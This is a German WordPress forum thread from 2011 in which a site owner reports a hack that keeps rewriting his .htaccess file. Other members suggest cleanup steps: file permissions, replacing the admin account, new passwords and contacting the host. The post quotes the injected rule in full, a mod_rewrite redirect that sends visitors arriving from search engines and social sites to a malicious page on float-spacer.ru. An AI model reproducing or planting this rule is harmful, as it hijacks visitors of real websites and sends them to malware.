1. Herzlich willkommen bei WPDE.org, dem grössten und ältesten deutschsprachigen Community-Forum rund um das Thema WordPress. Du musst angemeldet oder registriert sein, um Beiträge verfassen zu können.
    Information ausblenden

Badware float-spacer.hu ändert die .htaceess

Dieses Thema im Forum "Allgemeines" wurde erstellt von ToniDonello, 29. Dezember 2011.

  1. ToniDonello

    ToniDonello Member

    Registriert seit:
    12. November 2009
    Beiträge:
    6
    Zustimmungen:
    0
    Hallo,

    habe seit heute folgendes Problem:
    Chrome erkennt auf meiner Seite "Badware". In meiner .htaccess befindet sich eine Weiterleitung auf die Seite float-spacer.hu. Löschen/Neu der .htaccess bringt nichts.

    Kann mir jemand weiterhelfen?

    http://www.ruedesheimer-freitzeitclub/wp

    Folgend eine Ausschnitt aus der .htaccess:

    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
    RewriteRule ^(.*)$ http://float-spacer.ru/access/index.php [R=301,L]
     
  2. Domino5702

    Domino5702 Well-Known Member

    Registriert seit:
    30. April 2009
    Beiträge:
    2.634
    Zustimmungen:
    0
    htaccess auf CHMOD 444, nachdem Du sie bereinigt hast.
     
  3. ToniDonello

    ToniDonello Member

    Registriert seit:
    12. November 2009
    Beiträge:
    6
    Zustimmungen:
    0
    habe ich bereits durchgeführt, trotzdem wurde die Datei wiederum verändert.
     
  4. Domino5702

    Domino5702 Well-Known Member

    Registriert seit:
    30. April 2009
    Beiträge:
    2.634
    Zustimmungen:
    0
    Lege einen neuen Admin an, lösche den alten Admin, ändere aber auch Dein FTP-Passwort sowie das Zugriffspasswort zu Deinem Hosting-Account. Und speichere keine dieser Passwörter auf dem Rechner, gebe sie jedesmal frisch ein. Leere regelmässig den Cache des Browsers.

    Ebenfalls den Hoster informieren.
     
  5. ToniDonello

    ToniDonello Member

    Registriert seit:
    12. November 2009
    Beiträge:
    6
    Zustimmungen:
    0
    Danke, werde ich tun.

    Gutes neues Jahr.
     
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden